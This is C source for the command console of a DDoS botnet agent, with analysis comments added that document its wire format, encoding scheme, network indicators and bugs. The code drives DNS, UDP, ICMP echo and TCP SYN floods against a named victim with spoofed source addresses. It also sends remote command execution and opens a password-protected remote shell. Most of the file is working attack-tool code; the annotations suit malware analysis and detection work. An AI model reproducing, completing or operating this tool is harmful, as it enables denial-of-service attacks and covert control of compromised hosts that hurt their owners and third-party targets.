/*
 * Operator-side console for a DDoS agent. It shows a numbered menu, builds
 * one fixed-size command message per menu choice and sends it to a single
 * agent address over a raw IP socket.
 *
 * Analysis notes (wire format, as established by the code in this listing):
 *   - Transport: raw IP datagram with IP protocol number 11 (see send_msg();
 *     IANA lists 11 as NVP-II). There is no TCP or UDP header.
 *   - Datagram payload: always sizeof(payload) == 400 bytes.
 *   - payload[0]      = 2 ("To agent" in the original comments).
 *   - payload[1]      is never assigned by any command; it carries whatever
 *                     was on the stack.
 *   - payload[2..]    = encode() output over the plaintext work buffer.
 *   - plaintext[0]    is never assigned by any command (stack contents).
 *   - plaintext[1]    = command code 1..11.
 *   - plaintext[2..]  = per-command arguments; bytes the command does not
 *                     set are also uninitialised stack contents.
 *   - Command 6 tells the operator that the agent exposes a shell on TCP
 *     port SHELL_PORT; that port and the password literal printed by
 *     command6() are host/network indicators for the agent side.
 *
 * NOTE(review): the header names of the nine #include directives below were
 * lost when this listing was extracted. They are reproduced as found; the
 * file does not preprocess in this state.
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* TCP port reported to the operator for the agent's remote shell. */
#define SHELL_PORT 23281

void command0(void);
void command1(void);
void command2(void);
void command3(void);
void command4(void);
void command5(void);
void command6(void);
void command7(void);
void command8(void);
void command9(void);
void command10(void);
void command11(void);
void command12(void);
void pdie(const char *);
void encode(unsigned, char *, unsigned char *);
void decode(unsigned, const unsigned char *, char *);
int send_msg(struct in_addr dest, char *data, int len);

/*
 * Menu table: the array index is the number the operator types, and for
 * entries 1..11 it is also the command code placed in plaintext[1].
 */
struct command {
    char *cmd_descr;    /* text shown in the menu */
    void (*cmd)(void);  /* handler that prompts for arguments and sends */
} commands[] = {
    {"Enter agent IP address", &command0},
    {"Request status from agent", &command1},
    {"Initialize agent", &command2},
    {"Execute remote command, send back results", &command3},
    {"DNS flood", &command4},
    {"UDP or ICMP echo flood", &command5},
    {"Remote shell", &command6},
    {"Execute remote command, don't send back results", &command7},
    {"Kill current task", &command8},
    {"DNS flood with delay", &command9},
    {"TCP SYN flood", &command10},
    {"TCP SYN flood with delay", &command11},
    {"DNS flood with server", &command12}
};

/* Number of table entries; the same value is the menu's "Exit" option. */
#define LAST_COMMAND (sizeof(commands)/sizeof(struct command))

/* Destination of every message; zero means "not set yet". */
struct in_addr agent_ip;

/*
 * Menu loop. Refuses to run without effective uid 0 (send_msg() opens a raw
 * socket), prints the current agent address and the command table, reads a
 * menu number and dispatches through commands[].
 *
 * argc and argv are unused.
 */
int main(int argc, char **argv)
{
    int option;
    int i;

    if (geteuid() != 0) {
        printf("Need to run as root\n");
        exit(1);
    }

    for (;;) {
        if (agent_ip.s_addr == 0)
            printf("\nAgent address is not set.\n\n");
        else
            printf("\nAgent address is %d.%d.%d.%d\n\n",
                   ( (u_char *) &agent_ip.s_addr)[0],
                   ( (u_char *) &agent_ip.s_addr)[1],
                   ( (u_char *) &agent_ip.s_addr)[2],
                   ( (u_char *) &agent_ip.s_addr)[3]);

        for (i = 0; i < LAST_COMMAND; i++)
            printf("[%d] %s\n", i, commands[i].cmd_descr);
        printf("[%d] Exit\n", i);

        /*
         * LAST_COMMAND has the type of a sizeof expression, so `option` is
         * compared as an unsigned value here and a negative entry re-prompts
         * as well (on the usual platforms where size_t is at least as wide
         * as int).
         * NOTE(review): the scanf() result is not checked; on non-numeric
         * input `option` keeps its previous (initially indeterminate) value.
         */
        do {
            printf("\nEnter option: ");
            scanf("%d", &option);
        } while (option > LAST_COMMAND);

        if (option == LAST_COMMAND)
            break;
        /* Every command except 0 needs an agent address to send to. */
        else if (option >=1 && option <= LAST_COMMAND - 1 && agent_ip.s_addr == 0)
            fprintf(stderr, "\nYou haven't set the agent's IP address!\n");
        else
            commands[option].cmd();
    }
    return 0;
}

/*
 * Menu 0: read a host name or dotted address, resolve it with
 * gethostbyname() and store the first returned address in agent_ip.
 * Nothing is sent.
 *
 * NOTE(review): scanf("%s") has no field width, so input longer than 99
 * characters overruns buffer[100].
 */
void command0(void)
{
    struct hostent *agent;
    char buffer[100];

    printf("\nEnter agent IP address or host name: ");
    scanf("%s", buffer);
    if ( (agent = gethostbyname(buffer)) == NULL) {
        fprintf(stderr, "Error resolving host name\n");
        return;
    }
    /* First address of the result, copied as one 4-byte value. */
    agent_ip.s_addr = *(unsigned *) agent->h_addr_list[0];
}

/*
 * Menu 1: send command code 1 (status request). No arguments follow the
 * command byte; the rest of the plaintext buffer is uninitialised.
 */
void command1(void)
{
    unsigned char payload[400], decoded[sizeof(payload) - 2];

    payload[0] = 2; /* To agent */
    decoded[1] = 1; /* Command is request status */
    /* Careful!  Pass the right size or you'll overwrite something! */
    /* 398 encoded bytes land in payload[2..399]. */
    encode(sizeof(decoded), decoded, payload + 2);
    send_msg(agent_ip, payload, sizeof(payload) );
}

/*
 * Menu 2: send command code 2 (initialize) with a response type and either
 * one or ten IPv4 addresses.
 *
 * Plaintext layout: [1]=2, [2]=response_type, [3..6]=first address,
 * and for the ten-address case [3 + 4*i .. 6 + 4*i] = address i.
 *
 * NOTE(review): the prompt loop only rejects values above 3, so a negative
 * response_type is accepted and handled like type 2 (ten addresses).
 * NOTE(review): scanf("%s") has no field width (buffer[100]).
 */
void command2(void)
{
    int response_type, number_of_ips;
    struct in_addr ips[10];
    int i;
    struct hostent *host;
    char buffer[100];
    unsigned char payload[400], decoded[400];

    printf("\nType of desired response:\n\n"
           "[0] To 1 specific IP address\n"
           "[1] To 1 specific IP address and 9 random IP addresses\n"
           "[2] To 10 specific IP addresses\n"
           "[3] Abort\n");
    do {
        printf("\nEnter option: ");
        scanf("%d", &response_type);
    } while (response_type > 3);
    if (response_type == 3)
        return;

    number_of_ips = (response_type == 0 || response_type == 1) ? 1 : 10;
    printf("\nNeed to enter %d IP addresses or host names\n", number_of_ips);
    for (i = 0; i < number_of_ips; i++) {
        printf("\nEnter agent IP address or host name #%d: ", i + 1);
        scanf("%s", buffer);
        if ( (host = gethostbyname(buffer)) == NULL) {
            fprintf(stderr, "Error resolving host name\n");
            return;
        }
        ips[i].s_addr = *(unsigned *) host->h_addr_list[0];
    }

    payload[0] = 2; /* To agent */
    decoded[1] = 2; /* Command is initialize */
    decoded[2] = response_type;
    /* The ips[] array is copied byte by byte, in memory order. */
    if (response_type == 0 || response_type == 1) {
        decoded[3] = ((char *) &ips)[0];
        decoded[4] = ((char *) &ips)[1];
        decoded[5] = ((char *) &ips)[2];
        decoded[6] = ((char *) &ips)[3];
    } else
        for (i = 0; i < 10; i++) {
            decoded[3 + i*4] = ((char *) &ips)[i*4 + 0];
            decoded[4 + i*4] = ((char *) &ips)[i*4 + 1];
            decoded[5 + i*4] = ((char *) &ips)[i*4 + 2];
            decoded[6 + i*4] = ((char *) &ips)[i*4 + 3];
        }
    /* 398 encoded bytes land in payload[2..399]. */
    encode(sizeof(decoded) - 2, decoded, payload + 2);
    send_msg(agent_ip, payload, sizeof(payload) );
}

/*
 * Menu 3: send command code 3 followed by a NUL-terminated command line
 * (at most 99 characters) starting at plaintext[2]. The menu text says the
 * agent sends results back; no receive path exists in this listing.
 */
void command3(void)
{
    char buffer[100];
    unsigned char payload[400], decoded[400];
    int ch, len;

    printf("\nEnter command to execute at agent: ");
    /* Discard the rest of the menu-number line left in stdin by scanf(). */
    for (ch = 'x'; ch != '\n' && ch != EOF;)
        ch = getchar();
    fgets(buffer, sizeof(buffer), stdin);
    len = strlen(buffer);
    /* Strip the newline fgets() keeps. */
    if (len > 0 && buffer[len - 1] == '\n')
        buffer[len - 1] = '\0';

    payload[0] = 2; /* To agent */
    decoded[1] = 3; /* Command is execute command */
    strcpy(decoded + 2, buffer);
    /* 398 encoded bytes land in payload[2..399]. */
    encode(sizeof(decoded) - 2, decoded, payload + 2);
    send_msg(agent_ip, payload, sizeof(payload) );
}

/*
 * Menu 4: send command code 4 (DNS flood).
 *
 * Plaintext layout: [1]=4, [2..5]=target address octets, [6]=source port
 * high byte, [7]=source port low byte, [8]=0 for address / 1 for host name,
 * [9..]=NUL-terminated host name when [8] is 1.
 *
 * The menu lists options 0 and 1 only; entering 2 aborts.
 * NOTE(review): when a host name is chosen, a..d are never assigned and
 * their indeterminate values are still copied into [2..5].
 */
void command4(void)
{
    int option;
    int a, b, c, d;
    char hostname[100];
    int src_port;
    int len, ch;
    unsigned char payload[400], decoded[sizeof(payload) - 2];

    printf("\nHow do you wish to specify the victim's IP address:\n\n"
           "[0] Enter IP address\n"
           "[1] Enter host name\n");
    do {
        printf("\nEnter option: ");
        scanf("%d", &option);
    } while (option > 2);
    if (option == 2)
        return;

    if (option == 0) {
        printf("\nEnter victim IP address: ");
        scanf("%d.%d.%d.%d", &a, &b, &c, &d);
    } else {
        printf("\nEnter victim host name: ");
        /* Discard the rest of the previous input line. */
        for (ch = 'x'; ch != '\n' && ch != EOF;)
            ch = getchar();
        fgets(hostname, sizeof(hostname), stdin);
        len = strlen(hostname);
        if (len > 0 && hostname[len - 1] == '\n')
            hostname[len - 1] = '\0';
    }
    printf("UDP source port to use (enter 0 to use random port): ");
    scanf("%d", &src_port);

    payload[0] = 2; /* To agent */
    decoded[1] = 4; /* Command is DNS flood */
    decoded[2] = a;
    decoded[3] = b;
    decoded[4] = c;
    decoded[5] = d;
    decoded[6] = src_port >> 8;     /* port is sent high byte first */
    decoded[7] = src_port & 0xff;
    decoded[8] = option;
    if (option == 1)
        strcpy(&decoded[9], hostname);
    /* Careful!  Pass the right size or you'll overwrite something! */
    /* 398 encoded bytes land in payload[2..399]. */
    encode(sizeof(decoded), decoded, payload + 2);
    send_msg(agent_ip, payload, sizeof(payload) );
}

/*
 * Menu 5: send command code 5 (UDP or ICMP echo flood).
 *
 * Plaintext layout: [1]=5, [2]=0 for UDP / 1 for ICMP echo, [3]=destination
 * port, [4..7]=target address octets, [8..11]=source address octets,
 * [12]=0 for address / 1 for host name, [13..]=host name when [12] is 1.
 *
 * NOTE(review): the destination port is stored in a single byte, so only
 * its low 8 bits are sent (command4 uses two bytes for a port). It is also
 * left unassigned for the ICMP case, as are dst1..dst4 when a host name is
 * chosen.
 * NOTE(review): decoded is 400 bytes here and the full sizeof(decoded) is
 * passed to encode(), which therefore writes payload[2..401] -- two bytes
 * past the end of payload[400]. The other commands pass 398.
 */
void command5(void)
{
    int dos_type;
    int use_hostname;
    int len, ch;
    int dst1, dst2, dst3, dst4;
    int src1, src2, src3, src4;
    unsigned char payload[400], decoded[400];
    char hostname[100];
    int dst_port;

    printf("\nDoS type:\n\n"
           "[0] UDP flood\n"
           "[1] ICMP echo flood\n"
           "[2] Abort\n");
    do {
        printf("\nEnter option: ");
        scanf("%d", &dos_type);
    } while (dos_type > 2);
    if (dos_type == 2)
        return;

    printf("\nHow do you wish to specify the victim's IP address:\n\n"
           "[0] Enter IP address\n"
           "[1] Enter host name\n"
           "[2] Abort\n");
    do {
        printf("\nEnter option: ");
        scanf("%d", &use_hostname);
    } while (use_hostname > 2);
    if (use_hostname == 2)
        return;

    if (use_hostname == 0) {
        printf("\nEnter victim IP address: ");
        scanf("%d.%d.%d.%d", &dst1, &dst2, &dst3, &dst4);
    } else {
        printf("\nEnter victim host name: ");
        /* Discard the rest of the previous input line. */
        for (ch = 'x'; ch != '\n' && ch != EOF;)
            ch = getchar();
        fgets(hostname, sizeof(hostname), stdin);
        len = strlen(hostname);
        if (len > 0 && hostname[len - 1] == '\n')
            hostname[len - 1] = '\0';
    }
    printf("\nSpoofed source address to use: ");
    scanf("%d.%d.%d.%d", &src1, &src2, &src3, &src4);
    if (dos_type == 0) {
        printf("Dest. UDP port to use in flood: ");
        scanf("%d", &dst_port);
    }

    payload[0] = 2; /* To agent */
    decoded[1] = 5; /* Command is UDP or ICMP echo flood */
    decoded[2] = dos_type;
    decoded[3] = dst_port;
    decoded[4] = dst1;
    decoded[5] = dst2;
    decoded[6] = dst3;
    decoded[7] = dst4;
    decoded[8] = src1;
    decoded[9] = src2;
    decoded[10] = src3;
    decoded[11] = src4;
    decoded[12] = use_hostname;
    if (use_hostname == 1)
        strcpy(&decoded[13], hostname);
    /* Careful!  Pass the right size or you'll overwrite something! */
    encode(sizeof(decoded), decoded, payload + 2);
    send_msg(agent_ip, payload, sizeof(payload) );
}

/*
 * Menu 6: send command code 6 (start a shell on the agent) and print where
 * the operator is told to connect. No arguments follow the command byte.
 *
 * NOTE(review): the address octets are read through (char *), so on
 * platforms where char is signed an octet of 128 or more prints as a
 * negative number; main() uses (u_char *) for the same output.
 */
void command6(void)
{
    unsigned char payload[400], decoded[400];

    payload[0] = 2; /* To agent */
    decoded[1] = 6; /* Command is execute a shell */
    /* 398 encoded bytes land in payload[2..399]. */
    encode(sizeof(decoded) - 2, decoded, payload + 2);
    send_msg(agent_ip, payload, sizeof(payload) );
    printf("\nRemote shell available at %d.%d.%d.%d port %d.\n"
           "Use netcat to connect.  Password is \"SeNiF\"\n",
           ( (char *) &agent_ip.s_addr)[0],
           ( (char *) &agent_ip.s_addr)[1],
           ( (char *) &agent_ip.s_addr)[2],
           ( (char *) &agent_ip.s_addr)[3],
           SHELL_PORT);
}

/*
 * Menu 7: same message shape as command3() but with command code 7
 * (execute a command, no output returned).
 */
void command7(void)
{
    char buffer[100];
    unsigned char payload[400], decoded[400];
    int c, len;

    printf("\nEnter command to execute at agent: ");
    /* Discard the rest of the menu-number line left in stdin by scanf(). */
    for (c = 'x'; c != '\n' && c != EOF;)
        c = getchar();
    fgets(buffer, sizeof(buffer), stdin);
    len = strlen(buffer);
    /* Strip the newline fgets() keeps. */
    if (len > 0 && buffer[len - 1] == '\n')
        buffer[len - 1] = '\0';

    payload[0] = 2; /* To agent */
    decoded[1] = 7; /* Command is execute command, don't return output */
    strcpy(decoded + 2, buffer);
    /* 398 encoded bytes land in payload[2..399]. */
    encode(sizeof(decoded) - 2, decoded, payload + 2);
    send_msg(agent_ip, payload, sizeof(payload) );
}

/*
 * Menu 8: send command code 8 (kill the agent's current task). No
 * arguments follow the command byte.
 */
void command8(void)
{
    unsigned char payload[400], decoded[400];

    payload[0] = 2; /* To agent */
    decoded[1] = 8; /* Command is kill task */
    /* 398 encoded bytes land in payload[2..399]. */
    encode(sizeof(decoded) - 2, decoded, payload + 2);
    send_msg(agent_ip, payload, sizeof(payload) );
    printf("\nCommand to kill remote task has been sent.\n");
}

/*
 * Menu 9: send command code 9 (the menu calls it "DNS flood with delay";
 * the extra value prompted for is a repeat count).
 *
 * Plaintext layout: as command4() up to [7], then [8]=repeat count (one
 * byte, so only the low 8 bits are sent), [9]=0 for address / 1 for host
 * name, [10..]=host name when [9] is 1.
 *
 * NOTE(review): a..d are unassigned when a host name is chosen.
 */
void command9(void)
{
    int option;
    int a, b, c, d;
    char hostname[100];
    int src_port;
    int num_of_times;
    int len, ch;
    unsigned char payload[400], decoded[sizeof(payload) - 2];

    printf("\nHow do you wish to specify the victim's IP address:\n\n"
           "[0] Enter IP address\n"
           "[1] Enter host name\n");
    do {
        printf("\nEnter option: ");
        scanf("%d", &option);
    } while (option > 2);
    if (option == 2)
        return;

    if (option == 0) {
        printf("\nEnter victim IP address: ");
        scanf("%d.%d.%d.%d", &a, &b, &c, &d);
    } else {
        printf("\nEnter victim host name: ");
        /* Discard the rest of the previous input line. */
        for (ch = 'x'; ch != '\n' && ch != EOF;)
            ch = getchar();
        fgets(hostname, sizeof(hostname), stdin);
        len = strlen(hostname);
        if (len > 0 && hostname[len - 1] == '\n')
            hostname[len - 1] = '\0';
    }
    printf("UDP source port to use (enter 0 to use random port): ");
    scanf("%d", &src_port);
    printf("Number of times to send DNS flood: ");
    scanf("%d", &num_of_times);

    payload[0] = 2; /* To agent */
    decoded[1] = 9; /* Command is DNS flood with repeat count */
    decoded[2] = a;
    decoded[3] = b;
    decoded[4] = c;
    decoded[5] = d;
    decoded[6] = src_port >> 8;     /* port is sent high byte first */
    decoded[7] = src_port & 0xff;
    decoded[8] = num_of_times;
    decoded[9] = option;
    if (option == 1)
        strcpy(&decoded[10], hostname);
    /* Careful!  Pass the right size or you'll overwrite something! */
    /* 398 encoded bytes land in payload[2..399]. */
    encode(sizeof(decoded), decoded, payload + 2);
    send_msg(agent_ip, payload, sizeof(payload) );
}

/*
 * Menu 10: send command code 10 (TCP SYN flood).
 *
 * Plaintext layout: [1]=10, [2..5]=target address octets, [6..7]=target
 * port (high byte first), [8]=0 for random source / 1 for given source,
 * [9..12]=source address octets, [13]=0 for address / 1 for host name,
 * [14..]=host name when [13] is 1.
 *
 * Both menus list options 0 and 1 only; entering 2 aborts.
 * NOTE(review): dst1..dst4 are unassigned when a host name is chosen and
 * src1..src4 are unassigned when a random source is chosen, yet both are
 * copied into the message.
 */
void command10(void)
{
    int use_hostname;
    int use_real_ip;
    int dst1, dst2, dst3, dst4;
    int src1, src2, src3, src4;
    char hostname[100];
    int dst_port;
    int len, ch;
    unsigned char payload[400], decoded[sizeof(payload) - 2];

    printf("\nHow do you wish to specify the victim's IP address:\n\n"
           "[0] Enter IP address\n"
           "[1] Enter host name\n");
    do {
        printf("\nEnter use_hostname: ");
        scanf("%d", &use_hostname);
    } while (use_hostname > 2);
    if (use_hostname == 2)
        return;

    if (use_hostname == 0) {
        printf("\nEnter victim IP address: ");
        scanf("%d.%d.%d.%d", &dst1, &dst2, &dst3, &dst4);
    } else {
        printf("\nEnter victim host name: ");
        /* Discard the rest of the previous input line. */
        for (ch = 'x'; ch != '\n' && ch != EOF;)
            ch = getchar();
        fgets(hostname, sizeof(hostname), stdin);
        len = strlen(hostname);
        if (len > 0 && hostname[len - 1] == '\n')
            hostname[len - 1] = '\0';
    }
    printf("Destination TCP port: ");
    scanf("%d", &dst_port);

    printf("\nSource IP address to use in attack:\n\n"
           "[0] Use random IP\n"
           "[1] Enter IP address\n");
    do {
        printf("\nEnter option: ");
        scanf("%d", &use_real_ip);
    } while (use_real_ip > 2);
    if (use_real_ip == 2)
        return;
    if (use_real_ip == 1) {
        printf("\nEnter source IP address: ");
        scanf("%d.%d.%d.%d", &src1, &src2, &src3, &src4);
    }

    payload[0] = 2; /* To agent */
    decoded[1] = 10; /* Command is TCP SYN flood with no delay */
    decoded[2] = dst1;
    decoded[3] = dst2;
    decoded[4] = dst3;
    decoded[5] = dst4;
    decoded[6] = dst_port >> 8;     /* port is sent high byte first */
    decoded[7] = dst_port & 0xff;
    decoded[8] = use_real_ip;
    decoded[9] = src1;
    decoded[10] = src2;
    decoded[11] = src3;
    decoded[12] = src4;
    decoded[13] = use_hostname;
    if (use_hostname == 1)
        strcpy(&decoded[14], hostname);
    /* Careful!  Pass the right size or you'll overwrite something! */
    /* 398 encoded bytes land in payload[2..399]. */
    encode(sizeof(decoded), decoded, payload + 2);
    send_msg(agent_ip, payload, sizeof(payload) );
}

/*
 * Menu 11: send command code 11 (TCP SYN flood with delay).
 *
 * Plaintext layout: as command10() up to [12], then [13]=delay (one byte,
 * so only the low 8 bits are sent; the unit is not visible in this
 * listing), [14]=0 for address / 1 for host name, [15..]=host name when
 * [14] is 1.
 *
 * NOTE(review): same unassigned dst1..dst4 / src1..src4 cases as
 * command10().
 */
void command11(void)
{
    int use_hostname;
    int use_real_ip;
    int dst1, dst2, dst3, dst4;
    int src1, src2, src3, src4;
    char hostname[100];
    int dst_port;
    int delay;
    int len, ch;
    unsigned char payload[400], decoded[sizeof(payload) - 2];

    printf("\nHow do you wish to specify the victim's IP address:\n\n"
           "[0] Enter IP address\n"
           "[1] Enter host name\n");
    do {
        printf("\nEnter use_hostname: ");
        scanf("%d", &use_hostname);
    } while (use_hostname > 2);
    if (use_hostname == 2)
        return;

    if (use_hostname == 0) {
        printf("\nEnter victim IP address: ");
        scanf("%d.%d.%d.%d", &dst1, &dst2, &dst3, &dst4);
    } else {
        printf("\nEnter victim host name: ");
        /* Discard the rest of the previous input line. */
        for (ch = 'x'; ch != '\n' && ch != EOF;)
            ch = getchar();
        fgets(hostname, sizeof(hostname), stdin);
        len = strlen(hostname);
        if (len > 0 && hostname[len - 1] == '\n')
            hostname[len - 1] = '\0';
    }
    printf("Destination TCP port: ");
    scanf("%d", &dst_port);
    printf("Delay: ");
    scanf("%d", &delay);

    printf("\nSource IP address to use in attack:\n\n"
           "[0] Use random IP\n"
           "[1] Enter IP address\n");
    do {
        printf("\nEnter option: ");
        scanf("%d", &use_real_ip);
    } while (use_real_ip > 2);
    if (use_real_ip == 2)
        return;
    if (use_real_ip == 1) {
        printf("\nEnter source IP address: ");
        scanf("%d.%d.%d.%d", &src1, &src2, &src3, &src4);
    }

    payload[0] = 2; /* To agent */
    decoded[1] = 11; /* Command is TCP SYN flood with delay */
    decoded[2] = dst1;
    decoded[3] = dst2;
    decoded[4] = dst3;
    decoded[5] = dst4;
    decoded[6] = dst_port >> 8;     /* port is sent high byte first */
    decoded[7] = dst_port & 0xff;
    decoded[8] = use_real_ip;
    decoded[9] = src1;
    decoded[10] = src2;
    decoded[11] = src3;
    decoded[12] = src4;
    decoded[13] = delay;
    decoded[14] = use_hostname;
    if (use_hostname == 1)
        strcpy(&decoded[15], hostname);
    /* Careful!  Pass the right size or you'll overwrite something! */
    /* 398 encoded bytes land in payload[2..399]. */
    encode(sizeof(decoded), decoded, payload + 2);
    send_msg(agent_ip, payload, sizeof(payload) );
}

/*
 * Menu 12 ("DNS flood with server"): empty stub. Selecting it sends
 * nothing.
 */
void command12(void)
{
}

/*
 * Obfuscate a buffer with a running additive code (no key):
 *
 *     out[0] = in[0] + 23
 *     out[i] = in[i] + 23 + out[i - 1]        (all arithmetic modulo 256)
 *
 * len      number of bytes to read from recvbuff and write to decoded
 * recvbuff INPUT: the plaintext buffer (the parameter name is misleading)
 * decoded  OUTPUT: the encoded bytes (the parameter name is misleading)
 *
 * Because the scheme is a fixed, keyless transform, the difference between
 * two consecutive encoded bytes minus 23 gives back the plaintext byte;
 * decode() below is built on that relation.
 *
 * The caller must make sure `decoded` has room for len bytes (and at least
 * two, since sprintf() also writes a terminating NUL after the first byte).
 * NOTE(review): the loop condition is `i != len` with a signed i and starts
 * at 1, so len == 0 would not stop at the end of the buffer. Every caller
 * in this listing passes 398 or 400.
 */
void encode(unsigned int len, char *recvbuff, unsigned char *decoded)
{
    int i;

    decoded[0] = '\0';
    /* Writes the first encoded byte, then a NUL at decoded[1] that the loop
       below overwrites. */
    sprintf(decoded, "%c", recvbuff[0] + 23);
    for (i = 1; i != len; i++)
        decoded[i] = recvbuff[i] + 23 + decoded[i - 1];
}

/*
 * Inverse of encode(): recover plaintext bytes from an encoded buffer by
 * taking the difference of consecutive encoded bytes and subtracting 23.
 * It walks the input from the last byte to the first and pushes each
 * recovered byte onto the front of `decoded`.
 *
 * len      number of encoded bytes
 * encoded  INPUT: encoded bytes
 * decoded  OUTPUT: recovered bytes
 *
 * Not called anywhere in this listing.
 *
 * NOTE(review): the register-style local names suggest the routine was
 * transcribed from disassembly -- inference, not stated in the source.
 * NOTE(review): the malloc() result is not checked.
 * NOTE(review): the final sprintf() treats `buffer` as a C string, but
 * nothing in the loop guarantees a NUL inside its len bytes, and "%c%s" can
 * write one byte more than was read plus a terminator. Bounds of both
 * `buffer` and the caller's `decoded` should be confirmed before reusing
 * this routine in analysis tooling.
 */
void decode(unsigned len, const unsigned char *encoded, char *decoded)
{
    unsigned char *buffer; /* scratch copy; size is len rounded up to a multiple of 4 bytes */
    int eax, ebx, ecx, edx;

    buffer = (unsigned char *) malloc( (len + 3) & 0xfffffffc);
    decoded[0] = 0;
    for (ebx = len - 1; ebx >= 0; ebx--) {
        /* Undo the running sum: difference to the previous encoded byte. */
        eax = ebx ? encoded[ebx] - encoded[ebx - 1] : encoded[0];
        ecx = eax - 23;
        /* Bring the result back into 0..255 (arithmetic is modulo 256). */
        while (ecx < 0)
            ecx += 256;
        /* Save the bytes recovered so far ... */
        for (edx = 0; edx < len; edx++)
            buffer[edx] = decoded[edx];
        /* ... and shift them right by one behind the new byte. */
        decoded[0] = (unsigned char) ecx;
        for (edx = 1; edx < len; edx++)
            decoded[edx] = buffer[edx - 1];
        /* Rewrites the same result as new byte + saved bytes up to the
           first NUL. */
        sprintf(decoded, "%c%s", (unsigned char) ecx, buffer);
    }
    free(buffer);
}

/*
 * Send one message to `dest` as a raw IP datagram with protocol number 11.
 * A new socket is opened and closed for every message.
 *
 * dest  destination address (the agent)
 * data  bytes to send as the IP payload
 * len   number of bytes to send
 *
 * Returns 0. Failure to open the socket or to send does not return: pdie()
 * prints the error and exits the process.
 *
 * For network monitoring, the observable result is an IP datagram whose
 * protocol field is 11 and whose payload is the caller's buffer (400 bytes
 * from every caller in this listing, first byte 2).
 *
 * NOTE(review): `sockaddr` is not zeroed, so its padding bytes are
 * indeterminate.
 */
int send_msg(struct in_addr dest, char *data, int len)
{
    int sockfd, sentbytes;
    struct sockaddr_in sockaddr;

    if ( (sockfd = socket(PF_INET, SOCK_RAW, 11)) == -1)
        pdie("Error opening raw socket");

    /* Prepare sockaddr_in */
    sockaddr.sin_family = AF_INET;
    sockaddr.sin_port = 0;  /* no port: there is no transport header */
    sockaddr.sin_addr.s_addr = dest.s_addr;

    sentbytes = sendto(sockfd, data, len, 0,
                       (struct sockaddr *) &sockaddr, sizeof(sockaddr) );
    if (sentbytes == -1)
        pdie("Could not send data");
    close(sockfd);
    return 0;
}

/**********************************************************************
 * pdie --- Call perror() to figure out what's going on and die.
 *
 * mesg  prefix passed to perror(); the process then exits with status 1.
 **********************************************************************/
void pdie(const char *mesg)
{
    perror(mesg);
    exit(1);
}